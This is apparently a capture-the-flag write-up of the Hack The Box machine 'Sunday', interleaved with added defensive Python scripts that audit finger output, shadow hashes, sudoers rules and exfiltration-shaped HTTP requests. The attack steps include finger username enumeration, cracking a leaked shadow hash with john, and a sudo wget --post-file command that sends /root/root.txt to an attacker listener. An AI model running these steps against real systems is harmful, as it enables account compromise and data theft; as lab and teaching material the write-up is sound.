Hack The Box - Sunday (Without Metasploit)
Configuration
The operating system that I will be using to tackle this machine is a Kali Linux VM.
What I learnt from other writeups is that it is a good habit to map a domain name to the machine’s IP address so that it is easier to remember. This can be done by appending a line to /etc/hosts.
$ echo "10.10.10.76 sunday.htb" | sudo tee -a /etc/hosts
Reconnaissance
$ rustscan --accessible -a sunday.htb -r 1-65535 -- -sT -sV -sC -Pn
File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.10.76:111
Open 10.10.10.76:79
Open 10.10.10.76:22022
Open 10.10.10.76:46883
Starting Script(s)
Script to be run Some("nmap -vvv -p ")
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-19 13:19 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
Initiating Connect Scan at 13:19
Scanning sunday.htb (10.10.10.76) [4 ports]
Discovered open port 111/tcp on 10.10.10.76
Discovered open port 22022/tcp on 10.10.10.76
Discovered open port 79/tcp on 10.10.10.76
Discovered open port 46883/tcp on 10.10.10.76
Completed Connect Scan at 13:19, 0.01s elapsed (4 total ports)
Initiating Service scan at 13:19
Scanning 4 services on sunday.htb (10.10.10.76)
Completed Service scan at 13:19, 26.05s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.10.76.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:20, 11.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 1.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Nmap scan report for sunday.htb (10.10.10.76)
Host is up, received user-set (0.0066s latency).
Scanned at 2021-01-19 13:19:26 UTC for 38s
PORT STATE SERVICE REASON VERSION
79/tcp open finger syn-ack Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
22022/tcp open ssh syn-ack SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
| 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxAwq7HNZXHr7XEeYeKsbnaruPQyUK5IkSE/FxHesBaKQ37AsLjw8iacqUvcs8IuhPfiTtwuwU42zUHu1e1rmLpRlMyLQnjgJH1++fP5E0Qnxj4DrFr7aeRv1FqPkrnK/xCX46AdgUhs4+4YA04yfi8pOlaSEVucYaqWNhuqJkt8=
46883/tcp open unknown syn-ack
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.70 seconds
Enumeration (1)
Port 79 Sun Solaris fingerd
The finger service allows us to see who is currently logged on.
$ finger @sunday.htb
No one logged on
No one is logged on. However, we can still use the service to enumerate usernames on the machine by querying it with a wordlist of names.
$ perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t sunday.htb -m 100
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 100
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Tue Jan 19 09:52:40 2021 #########
access@sunday.htb: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@sunday.htb: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne marie@sunday.htb: Login Name TTY Idle When Where..anne ???..marie ???..
bin@sunday.htb: bin ??? < . . . . >..
dee dee@sunday.htb: Login Name TTY Idle When Where..dee ???..dee ???..
jo ann@sunday.htb: Login Name TTY Idle When Where..jo ???..ann ???..
la verne@sunday.htb: Login Name TTY Idle When Where..la ???..verne ???..
line@sunday.htb: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@sunday.htb: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@sunday.htb: Login Name TTY Idle When Where..miof ???..mela ???..
sammy@sunday.htb: sammy console <Jul 31 17:59>..
root@sunday.htb: root Super-User pts/3 <Apr 24, 2018> sunday ..
sunny@sunday.htb: sunny pts/3 <Apr 24, 2018> 10.10.14.4 ..
zsa zsa@sunday.htb: Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Tue Jan 19 09:54:14 2021 #########
14 results.
Queries whose result contains ???.. did not match an account; the others did. From these we can gather that admin, bin, line, message, sammy, sunny and root correspond to real accounts, but only sammy, sunny and root have a recorded login, so let's focus on them.
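To make the "???.." rule above explicit, here is a small parser for finger-user-enum output. It is an added example, not part of the writeup or of the finger-user-enum tool; the sample lines are copied from the scan output above. It treats a record as a confirmed account only when the daemon returned a When field in angle brackets, and distinguishes accounts that have never logged in (the `< . . . . >` form) from those with a recorded session.

```python
import re

# Sample lines copied from the finger-user-enum output above.
SAMPLE = """\
access@sunday.htb: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@sunday.htb: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..
anne marie@sunday.htb: Login Name TTY Idle When Where..anne ???..marie ???..
bin@sunday.htb: bin ??? < . . . . >..
sammy@sunday.htb: sammy console <Jul 31 17:59>..
root@sunday.htb: root Super-User pts/3 <Apr 24, 2018> sunday ..
sunny@sunday.htb: sunny pts/3 <Apr 24, 2018> 10.10.14.4 ..
"""

# One finger record: login name, free text (GECOS name and/or TTY), the
# "When" field in angle brackets, and an optional "Where" host.
RECORD_RE = re.compile(r"^(?P<login>\S+)\s+(?P<middle>.*?)<(?P<when>[^>]*)>(?P<where>.*)$")


def parse_finger_enum(text):
    """Return {login: {"last_login": str|None, "where": str|None}} for every
    account the finger daemon confirmed.  finger-user-enum joins the daemon's
    reply lines with '..'; a reply such as 'anne ???' (no <When> field) means
    no such account, while '< . . . . >' means the account exists but has
    never logged in."""
    accounts = {}
    for line in text.splitlines():
        _query, sep, reply = line.partition(": ")
        if not sep:
            continue
        for record in reply.split(".."):
            record = record.strip()
            if not record or record.startswith("Login Name TTY"):
                continue          # empty fragment or column header
            m = RECORD_RE.match(record)
            if m is None:
                continue          # '<name> ???': finger found no such account
            when = m.group("when").strip()
            never = when.replace(".", "").strip() == ""   # '< . . . . >'
            accounts[m.group("login")] = {
                "last_login": None if never else when,
                "where": m.group("where").strip() or None,
            }
    return accounts


def accounts_with_logins(accounts):
    """Logins that have a recorded session, i.e. the accounts in interactive use."""
    return sorted(login for login, info in accounts.items() if info["last_login"])


if __name__ == "__main__":
    found = parse_finger_enum(SAMPLE)
    print("confirmed accounts:", ", ".join(sorted(found)))
    print("with recorded logins:", ", ".join(accounts_with_logins(found)))
```

Note that the query word and the returned login differ: the query "admin" matched adm, lp and the other service accounts, and "bin" exists even though its GECOS field is "???" because the daemon still returned a When field for it. From a defender's side, the same output shows why fingerd should not be exposed: it confirms account names and last-login details to anyone who asks.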
I would normally use hydra to brute-force their passwords, but it was so unstable that I ended up guessing manually and found sunny's password, which happens to be sunday. We then use this password to ssh into the machine.
$ ssh sunny@sunday.htb -p 22022
Password:
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ id
uid=65535(sunny) gid=1(other) groups=1(other)
Enumeration (2)
There was a folder at /backup containing 2 files.
sunny@sunday:~$ ls -al /backup
total 5
drwxr-xr-x 2 root root 4 2018-04-15 20:44 .
drwxr-xr-x 26 root root 27 2020-07-31 17:59 ..
-r-x--x--x 1 root root 53 2018-04-24 10:35 agent22.backup
-rw-r--r-- 1 root root 319 2018-04-15 20:44 shadow.backup
We were only able to read shadow.backup, but it contained the password hashes of sammy and sunny!
sunny@sunday:~$ cat /backup/shadow.backup
...
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
I then went on to crack the hash of sammy using john.
$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow.backup
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude! (sammy)
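The shadow.backup listing and john's "Cost 1 (iteration count) is 5000" line together say quite a lot about these accounts before any cracking starts. The audit script below is an added example (not the writeup's tooling and not john) that parses the two shadow lines shown above: it splits the crypt(3) string into algorithm, rounds and salt, applies the default of 5000 rounds for `$5$`/`$6$` hashes that carry no `rounds=` prefix, converts the last-change day count into a date, and flags the weaknesses a defender would want to fix. The `today` date passed in is the scan date from the nmap output.

```python
from datetime import date, timedelta

# The two lines from /backup/shadow.backup shown above.
SHADOW_BACKUP = """\
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

EPOCH = date(1970, 1, 1)
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
             "2a": "bcrypt", "2b": "bcrypt", "y": "yescrypt"}
# Rounds used by sha256crypt/sha512crypt when no rounds= prefix is present;
# this is the 5000 that john reported as "Cost 1".
DEFAULT_SHA_ROUNDS = 5000


def parse_crypt_hash(field):
    """Split a crypt(3) string '$id$[rounds=N$]salt$digest' into its parts."""
    if field in ("", "*", "!!", "NP", "*LK*") or field.startswith("!"):
        return {"algorithm": "none/locked", "rounds": None, "salt": None}
    if not field.startswith("$"):
        return {"algorithm": "descrypt", "rounds": None, "salt": field[:2]}
    parts = field.split("$")[1:]          # drop the empty element before the first '$'
    algorithm = CRYPT_IDS.get(parts[0], "unknown($%s$)" % parts[0])
    rest = parts[1:]
    rounds = None
    if rest and rest[0].startswith("rounds="):
        rounds = int(rest[0][len("rounds="):])
        rest = rest[1:]
    if rounds is None and algorithm in ("sha256crypt", "sha512crypt"):
        rounds = DEFAULT_SHA_ROUNDS
    return {"algorithm": algorithm, "rounds": rounds, "salt": rest[0] if rest else None}


def audit_shadow(text, today):
    """One finding dict per account: hash details, last password change, issues."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        # name:pw:lastchg:min:max:warn:inactive:expire:flag (pad short lines)
        f = (line.split(":") + [""] * 9)[:9]
        user, pw, lastchg, maxage = f[0], f[1], f[2], f[4]
        info = parse_crypt_hash(pw)
        changed = EPOCH + timedelta(days=int(lastchg)) if lastchg else None
        issues = []
        if info["algorithm"] in ("descrypt", "md5crypt"):
            issues.append("weak hash algorithm")
        if info["algorithm"] in ("sha256crypt", "sha512crypt") and info["rounds"] <= DEFAULT_SHA_ROUNDS:
            issues.append("default iteration count")
        if changed is not None and (today - changed).days > 365:
            issues.append("password not changed in over a year")
        if maxage == "":
            issues.append("no maximum password age")
        findings.append({"user": user, "changed": changed, "issues": issues, **info})
    return findings


if __name__ == "__main__":
    for item in audit_shadow(SHADOW_BACKUP, today=date(2021, 1, 19)):
        print(item["user"], item["algorithm"], item["rounds"], item["changed"], item["issues"])
```

Two details worth noticing in the output: sunny's last-change day 17636 decodes to 2018-04-15, the same day the backup file was written, and the default 5000 rounds is what lets a wordlist run like the one above finish quickly. Raising `rounds=` (or moving to sha512crypt/yescrypt), setting a maximum age, and not leaving world-readable copies of shadow in /backup are the fixes on the defender's list.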
We can then su to sammy.
sunny@sunday:~$ su - sammy
Password:
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sammy@sunday:~$ id
uid=101(sammy) gid=10(staff) groups=10(staff)
user.txt
The user flag is in sammy’s home directory.
sammy@sunday:~$ cat Desktop/user.txt
a3d9XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Enumeration (3)
Checking sammy’s sudo rights, we see that he can run wget as root.
sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
This means we could use wget as root either to overwrite /etc/passwd or to exfiltrate files. This box was very unstable, so I decided to just stick with exfiltrating. (I am sorry for not following the usual approach of getting a shell, but the instability of this machine was too much for me haha)
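The rule `(root) NOPASSWD: /usr/bin/wget` is the kind of thing a sudoers review should catch before a pentest does. The script below is an added example, not part of the writeup: it parses a constructed sudoers fragment (the sammy line mirrors the rule `sudo -l` reported above; the root, backup and ops lines are made up for contrast) and flags commands that run as root with caller-chosen arguments, rating network clients such as wget (which, as the text notes, can read any file with --post-file and write any path) as high severity. The `FILE_IO_CLIENTS` set is a starting list, not an exhaustive one.

```python
import re
import shlex

# Constructed sudoers fragment; only the sammy rule comes from the box.
SAMPLE_SUDOERS = """\
root    ALL=(ALL) ALL
sammy   ALL=(root) NOPASSWD: /usr/bin/wget
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /var/www/ /mnt/backup/
ops     ALL=(root) /usr/sbin/service httpd restart
"""

# Network clients that, given caller-chosen arguments, read any file
# (wget --post-file, curl -d @file) or write any path (-O / -o).
FILE_IO_CLIENTS = {"wget", "curl"}

# user host=(runas) TAG: command [args][, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$")


def parse_sudoers_rule(line):
    """Parse one user specification; returns None for lines that are not rules."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    runas = (m.group("runas") or "root").split(":")[0].strip()   # drop ':group'
    commands = []
    for spec in m.group("cmds").split(","):
        words = shlex.split(spec)
        # In sudoers a bare command path allows ANY arguments.
        commands.append({"path": words[0], "args": words[1:], "any_args": len(words) == 1})
    return {"user": m.group("user"), "runas": runas, "tags": tags, "commands": commands}


def audit_sudoers(text):
    """Return a finding per risky command grant (user, command, severity, reason)."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#") or line.startswith("Defaults"):
            continue
        rule = parse_sudoers_rule(line)
        if rule is None:
            continue
        as_root = rule["runas"] in ("root", "ALL")
        for cmd in rule["commands"]:
            name = cmd["path"].rsplit("/", 1)[-1]
            if cmd["path"] == "ALL":
                sev, why = "high", "unrestricted command as %s" % rule["runas"]
            elif as_root and name in FILE_IO_CLIENTS and cmd["any_args"]:
                sev, why = "high", "%s with free arguments can read/write any file as root" % name
            elif as_root and cmd["any_args"]:
                sev, why = "medium", "free arguments; check the binary for escape options"
            else:
                continue   # fixed arguments, or not running as root
            if "NOPASSWD" in rule["tags"]:
                why += " (NOPASSWD: no credential prompt)"
            findings.append({"user": rule["user"], "command": cmd["path"],
                             "severity": sev, "reason": why})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("%-6s %-8s %-20s %s" % (f["severity"], f["user"], f["command"], f["reason"]))
```

The fix is not to pin wget's arguments in sudoers (its option set is too large to allow-list safely) but to grant a small wrapper script that hard-codes the URL and output path, and to keep the password prompt.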
Exploitation / root.txt
We can start a nc listener:
$ sudo rlwrap nc -lvnp 80
[sudo] password for kali:
listening on [any] 80 ...
And then use wget to send out the contents of the root flag in root’s home directory.
sammy@sunday:~$ sudo wget --post-file=/root/root.txt 10.10.XX.XX
--20:51:15-- http://10.10.XX.XX/
=> `index.html'
Connecting to 10.10.XX.XX:80... connected.
HTTP request sent, awaiting response...
Then on our listener, we get the root flag!
$ sudo rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.76] 46114
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.XX.XX
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
fb40XXXXXXXXXXXXXXXXXXXXXXXXXXXX
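The request the listener received has a recognisable shape that a proxy or egress sensor can pick up: a POST from a command-line client, a form-encoded content type with a body that is not key=value data, and a Host header that is a bare IP. The detector below is an added example, not part of the writeup; it parses the request captured above (with a constructed listener address in place of the masked 10.10.XX.XX) plus a constructed browser form submission for contrast, and lists the indicators it finds.

```python
import re

# The request captured on the listener above; the writeup masks the listener
# address, so a constructed 10.10.14.2 is used here.
CAPTURED = """\
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.2
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

fb40XXXXXXXXXXXXXXXXXXXXXXXXXXXX
"""

# Constructed benign form submission for contrast.
BENIGN = """\
POST /login HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

user=sunny&remember=on
"""

BARE_IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def parse_request(raw):
    """Minimal HTTP/1.x request parser: request line, headers (lower-cased), body."""
    raw = raw.replace("\r\n", "\n")
    head, _sep, body = raw.partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _colon, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def post_file_indicators(raw):
    """Reasons a request looks like a command-line client posting a file rather
    than a browser submitting a form.  Empty list means nothing notable."""
    req = parse_request(raw)
    if req["method"] != "POST":
        return []
    h = req["headers"]
    reasons = []
    if h.get("user-agent", "").split("/")[0] in ("Wget", "curl"):
        reasons.append("command-line HTTP client user agent")
    if h.get("content-type", "").startswith("application/x-www-form-urlencoded") and "=" not in req["body"]:
        reasons.append("form-encoded content type but body has no key=value pairs")
    if BARE_IP_HOST.match(h.get("host", "")):
        reasons.append("Host header is a bare IP address")
    return reasons


if __name__ == "__main__":
    for label, sample in (("captured", CAPTURED), ("benign", BENIGN)):
        print(label, post_file_indicators(sample) or "no indicators")
```

None of these indicators is conclusive on its own (plenty of legitimate automation uses wget against an IP), but a root-owned process on a server making such a POST to an address outside the environment is exactly the event egress filtering and sudo logging should surface.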
